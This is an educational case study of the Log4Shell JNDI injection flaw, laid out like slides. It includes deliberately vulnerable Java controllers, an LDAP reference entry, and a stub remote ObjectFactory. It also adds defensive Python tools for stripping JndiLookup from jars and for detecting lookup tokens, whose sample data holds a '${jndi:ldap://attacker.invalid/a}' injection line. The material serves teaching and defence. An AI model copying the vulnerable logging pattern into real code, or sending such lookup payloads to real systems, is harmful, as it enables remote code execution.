JNDI injection. Log4Shell case study

On December 10, 2021, Apache released a fix for CVE-2021-44228, a critical RCE vulnerability affecting Log4j that is being exploited in the wild.


a lot of people talked about this —

${jndi:ldap://} in ALL fields!

Underlying mechanism

  • log4j could do JNDI lookups all along: a ${jndi:...} token in a logged message is resolved through JNDI at log time
  • no deserialization gadget required: the LDAP entry's javaCodeBase + javaFactory attributes make the application's JNDI client fetch and instantiate a remote class

Vulnerable application example

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.web.bind.annotation.RequestHeader;

public class MainController {

    private static final Logger logger = LogManager.getLogger("HelloWorld");

    public String index(@RequestHeader("X-Api-Version") String apiVersion) {
        // header value is logged verbatim; vulnerable log4j-core resolves ${jndi:...} in it
        logger.info("Received a request for API version " + apiVersion);
        return "Hello, world!";
    }
}

~ ldapsearch -x -H ldap://
# extended LDIF
# LDAPv3
# base <> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
dn:: Y249bG9nNHNoZWxsLWhvdHBhdGNoLCA=
cn: log4shell-hotpatch
javaClassName: attempting to patch Log4Shell vulnerability with payload hosted
objectclass: javaNamingReference
javaFactory: Log4ShellHotpatch
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1

import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;

public class Log4ShellHotpatch implements ObjectFactory {
    // Called by the JNDI client of the logging application once it resolves the
    // javaNamingReference above, so this body executes inside that application
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) {
        /* payload */
        return null;
    }
}

Hour-one mitigations
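The deck leaves this heading without detail. What follows is an added example, not from the original slides: one hour-one check and mitigation that inventories jars (including jars nested inside fat jars under BOOT-INF/lib/) for the class that implements the ${jndi:...} lookup, and rebuilds a jar without that class, which has the same effect as the zip -q -d ... JndiLookup.class workaround Apache published for installations that could not upgrade immediately. The jars built here are constructed stand-ins with a fake manifest, not real log4j artifacts; scan_tree is the function you would point at a server's deployment directory.

```python
import io
import zipfile
from pathlib import Path
from typing import Dict, List, Optional

# Class that implements the ${jndi:...} lookup; removing it from log4j-core is the
# classic hour-one mitigation when an upgrade cannot ship immediately.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def read_implementation_version(zf: zipfile.ZipFile) -> str:
    """Best-effort version from the jar manifest, 'unknown' if absent."""
    if "META-INF/MANIFEST.MF" not in zf.namelist():
        return "unknown"
    manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return "unknown"


def inspect_jar(data: bytes, label: str) -> List[dict]:
    """Report this jar and every jar nested inside it (fat jars bundle their
    dependencies, e.g. BOOT-INF/lib/*.jar) and whether each ships JndiLookup."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        findings.append({
            "jar": label,
            "has_jndi_lookup": JNDI_LOOKUP_CLASS in names,
            "version": read_implementation_version(zf),
        })
        for name in names:
            if name.endswith(".jar"):
                findings.extend(inspect_jar(zf.read(name), f"{label}!{name}"))
    return findings


def strip_jndi_lookup(data: bytes) -> bytes:
    """Rebuild the jar without JndiLookup.class (same effect as
    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def scan_tree(root) -> List[dict]:
    """Inspect every *.jar / *.war below root (what you run on a server at hour one)."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.suffix in (".jar", ".war"):
            findings.extend(inspect_jar(path.read_bytes(), str(path)))
    return findings


def build_sample_jar(include_jndi_lookup: bool, version: str,
                     nested: Optional[Dict[str, bytes]] = None) -> bytes:
    """Constructed stand-in for a jar (not a real log4j artifact). `nested` maps
    entry names to jar bytes to embed, mimicking a fat-jar layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
        for name, jar_bytes in (nested or {}).items():
            zf.writestr(name, jar_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    core = build_sample_jar(True, "sample-vulnerable")
    app = build_sample_jar(False, "sample-app", {"BOOT-INF/lib/log4j-core-sample.jar": core})
    for finding in inspect_jar(app, "app.jar"):
        print(finding)
    print(inspect_jar(strip_jndi_lookup(core), "log4j-core-stripped.jar"))
```

Removing the class only disables the ${jndi:...} lookup; it does not change the version the manifest reports, which is why the report shows both fields, and the inventory should be re-run after the upgrade lands.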

Patch bypasses

  • JNDI still usable, so DoS was found (boring) and subsequently escalated to RCE (not boring)
  • LOG4J_FORMAT_MSG_NO_LOOKUPS and %m{nolookups} bypassed in some cases through the thread context: a pattern layout containing ${ctx:apiversion} still expands attacker-controlled context values
  • host verification bypassed with
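Because the mechanism is lookup expansion, and a %m{nolookups} pattern can still expand attacker data that reaches it indirectly through ${ctx:...}, the input-side check worth having is independent of the lookup prefix. The following is an added example, not code from the original slides: a small detector that a WAF, a log-ingest filter or the controller itself can run over header values and request log lines. It tokenizes lookup syntax structurally (balanced ${ ... }), so nested lookups are reported one by one; any lookup token in untrusted input is flagged as suspicious and a jndi prefix as critical. The sample log lines and the attacker.invalid host are constructed.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample request log lines (not from the original slides); the quoted
# part is the raw header value as received.
SAMPLE_LINES = [
    'GET / "X-Api-Version: 1.0" 200',
    'GET / "X-Api-Version: ${jndi:ldap://attacker.invalid/a}" 200',
    'GET / "X-Api-Version: ${upper:${ctx:apiversion}}" 200',
    'GET / "User-Agent: price $5.00 {not a lookup}" 200',
]


def extract_lookups(text: str) -> List[Tuple[str, str]]:
    """Return every balanced ${...} token in text as (prefix, body), innermost first.

    Braces are matched structurally rather than by regex so that nested lookups
    (one lookup's result feeding another) are each reported.
    """
    tokens = []
    open_positions = []          # indexes of "${" not yet closed
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            open_positions.append(i)
            i += 2
            continue
        if text[i] == "}" and open_positions:
            start = open_positions.pop()
            body = text[start + 2:i]
            prefix = body.split(":", 1)[0].strip().lower()
            tokens.append((prefix, body))
        i += 1
    return tokens


def contains_lookup(value: str) -> bool:
    """Input-side check: untrusted data carrying lookup syntax should not reach a logger."""
    return bool(extract_lookups(value))


@dataclass
class Finding:
    line_no: int
    severity: str   # "critical" for a jndi prefix, "suspicious" for any other lookup
    prefix: str
    token: str


def scan_lines(lines: List[str]) -> List[Finding]:
    """Triage signal over request logs; it does not reimplement log4j's own parser,
    so a clean result is a signal, not proof of safety."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for prefix, body in extract_lookups(line):
            severity = "critical" if prefix == "jndi" else "suspicious"
            findings.append(Finding(n, severity, prefix, "${" + body + "}"))
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.severity:10} prefix={f.prefix!r} token={f.token}")
```

The prefix-agnostic policy is deliberate: rejecting or alerting on any lookup token in untrusted input covers the indirect ${ctx:...} path above without having to predict which prefix an input will be wrapped in, while the jndi prefix is escalated because that is the one that reaches a network resolver.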

Post-patch vulnerable code example

public String index(@RequestHeader("X-Api-Version") String apiVersion) {

    // Add user controlled input to threadcontext;
    // Used in log via ${ctx:apiversion}
    ThreadContext.put("apiversion", apiVersion);

    // Notice how these changes remove apiVersion from directly being logged;
    // the pattern layout's ${ctx:apiversion} still expands the header value
    logger.info("Received a request for API version");
    return "Hello, world!";
}

Insecure deserialization

Insecure deserialization is when user-controllable data is deserialised by a website. This potentially enables an attacker to manipulate serialised objects…